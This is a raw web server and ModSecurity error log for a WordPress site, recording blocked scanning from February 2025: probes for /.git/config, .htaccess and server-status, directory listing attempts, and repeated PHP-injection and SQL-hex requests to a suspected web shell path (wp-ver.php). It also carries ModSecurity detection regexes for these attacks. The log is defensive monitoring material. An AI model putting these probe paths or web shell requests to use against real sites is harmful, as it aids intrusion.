"WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6aRBx6L2Yd7jJ7dnMJDmwAAAA8"], referer: www.google.com [Sat Feb 08 04:53:38.671683 2025] [authz_core:error] [pid 16910:tid 140364597901056] [client 167.99.210.137:36974] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/08 04:53:43 [error] 16042#16042: *296751 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Feb 08 08:29:59.327747 2025] [authz_core:error] [pid 16081:tid 140364589508352] [client 167.99.181.249:60486] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/08 08:30:04 [error] 16043#16043: *298017 access forbidden by rule, client: 167.99.181.249, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Feb 08 13:28:02.950678 2025] [:error] [pid 16910:tid 140364539152128] [client 190.134.213.218:41420] [client 190.134.213.218] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z6eiMh2kHLqVsQZEN09BSgAAANg"] [Sat Feb 08 13:55:06.314392 2025] [autoindex:error] [pid 16080:tid 140364572722944] [client 13.71.23.36:42124] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 09 00:46:03.221547 2025] [autoindex:error] [pid 16910:tid 140364665042688] [client 213.136.78.38:35218] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 00:46:13.692650 2025] [autoindex:error] [pid 16081:tid 140364614686464] [client 213.136.78.38:35250] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 00:46:18.096795 2025] [autoindex:error] [pid 16910:tid 140364581115648] [client 213.136.78.38:35268] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 00:46:22.228457 2025] [autoindex:error] [pid 16079:tid 140364681828096] [client 213.136.78.38:35284] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:16:10.299737 2025] [autoindex:error] [pid 16081:tid 140364777862912] [client 38.252.239.77:36086] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:16:25.387956 2025] [autoindex:error] [pid 16081:tid 140364547544832] [client 38.252.239.77:36090] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:16:43.855394 2025] [autoindex:error] [pid 16080:tid 140364681828096] [client 38.252.239.77:36094] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:16:53.392779 2025] [autoindex:error] [pid 16910:tid 140364631471872] [client 38.252.239.77:36104] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:17:06.209981 2025] [autoindex:error] [pid 16910:tid 140364681828096] [client 38.252.239.77:36116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:17:14.838626 2025] [autoindex:error] [pid 16081:tid 140364794648320] [client 38.252.239.77:36124] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:17:24.112551 2025] [autoindex:error] [pid 16081:tid 140364639864576] [client 38.252.239.77:36128] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 01:17:50.179938 2025] [autoindex:error] [pid 16910:tid 140364539152128] [client 38.252.239.77:36142] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 09 07:50:52.562497 2025] [autoindex:error] [pid 12396:tid 140563668002560] [client 157.245.108.90:51440] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 09 10:19:38.316325 2025] [:error] [pid 12396:tid 140563634431744] [client 35.181.5.123:34164] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/github.php [Sun Feb 09 10:20:03.494399 2025] [:error] [pid 12396:tid 140563651217152] [client 35.181.5.123:34206] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/github.php 2025/02/09 20:05:39 [error] 11666#11666: *340508 access forbidden by rule, client: 193.41.206.176, server: mail.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "mail.investigacionperu.com" [Mon Feb 10 09:35:25.401267 2025] [authz_core:error] [pid 32209:tid 140313186486016] [client 167.99.182.39:56510] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/10 09:35:29 [error] 32172#32172: *352535 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 10 10:03:16.299026 2025] [:error] [pid 32471:tid 140312966006528] [client 38.252.239.77:60342] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6oVNOzRuLULwiD_DB-_0wAAANM"], referer: www.google.com [Mon Feb 10 10:03:33.172343 2025] [:error] [pid 32210:tid 140313091897088] [client 38.252.239.77:60348] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6oVRaG2BBAJSoeiLnNbVwAAAIQ"], referer: www.google.com [Mon Feb 10 10:49:24.396952 2025] [autoindex:error] [pid 32471:tid 140312932435712] [client 157.245.108.90:39482] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Feb 10 11:12:45.567058 2025] [authz_core:error] [pid 32471:tid 140313083504384] [client 164.90.208.56:42354] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/02/10 11:12:50 [error] 32171#32171: *353425 access forbidden by rule, client: 164.90.208.56, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Feb 10 21:16:09.893048 2025] [:error] [pid 14671:tid 140312974399232] [client 13.38.100.196:46438] [client 13.38.100.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6qy6d5KJMRjUobGoX783wAAAdI"], referer: www.google.com [Mon Feb 10 21:16:17.253787 2025] [:error] [pid 14507:tid 140313016362752] [client 13.38.100.196:46440] [client 13.38.100.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6qy8cRffFK3ijeAyX5bwwAAAU0"], referer: www.google.com [Mon Feb 10 21:21:07.079225 2025] [:error] [pid 14671:tid 140312991184640] [client 13.38.71.211:46508] [client 13.38.71.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6q0E95KJMRjUobGoX784wAAAdA"], referer: www.google.com [Mon Feb 10 21:21:18.709754 2025] [:error] [pid 14671:tid 140313033148160] [client 13.38.71.211:46530] [client 13.38.71.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6q0Ht5KJMRjUobGoX785AAAAcs"], referer: www.google.com [Tue Feb 11 02:21:44.168747 2025] [autoindex:error] [pid 14581:tid 140313066718976] [client 157.245.108.90:56464] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Feb 11 11:34:13.797930 2025] [:error] [pid 9215:tid 139970383648512] [client 13.37.226.30:58014] [client 13.37.226.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6t8BdUJ35TA_w4cnqzq5wAAANA"], referer: www.google.com [Tue Feb 11 11:34:54.616525 2025] [:error] [pid 8483:tid 139970375255808] [client 13.37.226.30:58172] [client 13.37.226.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6t8Lt_yvZZi-ioW_Cr7MwAAABE"], referer: www.google.com [Tue Feb 11 14:43:07.894490 2025] [autoindex:error] [pid 8484:tid 139970434004736] [client 157.245.108.90:54144] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Feb 11 15:46:26.102408 2025] [autoindex:error] [pid 8484:tid 139970341684992] [client 38.252.239.77:35368] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:46:34.865823 2025] [autoindex:error] [pid 9215:tid 139970375255808] [client 38.252.239.77:35384] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:46:44.633096 2025] [autoindex:error] [pid 9215:tid 139970501146368] [client 38.252.239.77:35394] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:46:59.644687 2025] [autoindex:error] [pid 8484:tid 139970442397440] [client 38.252.239.77:35416] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:47:12.947331 2025] [autoindex:error] [pid 8484:tid 139970425612032] [client 38.252.239.77:35420] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:48:03.455970 2025] [autoindex:error] [pid 9215:tid 139970591053568] [client 38.252.239.77:35468] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:48:18.473620 2025] [autoindex:error] [pid 8485:tid 139970434004736] [client 38.252.239.77:35478] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 15:48:54.652919 2025] [autoindex:error] [pid 9215:tid 139970450790144] [client 38.252.239.77:35664] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Feb 11 17:41:14.455052 2025] [:error] [pid 8484:tid 139970400433920] [client 38.252.239.77:52628] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6vSCl5KaJoFiRvozgE6AQAAAE4"], referer: www.google.com [Tue Feb 11 17:41:25.485392 2025] [:error] [pid 9215:tid 139970316506880] [client 38.252.239.77:52650] [client 38.252.239.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:fw. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:fw: fwrite"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ver.php"] [unique_id "Z6vSFdUJ35TA_w4cnqzvwwAAANg"], referer: www.google.com [Tue Feb 11 22:35:19.895256 2025] [autoindex:error] [pid 9215:tid 139970484360960] 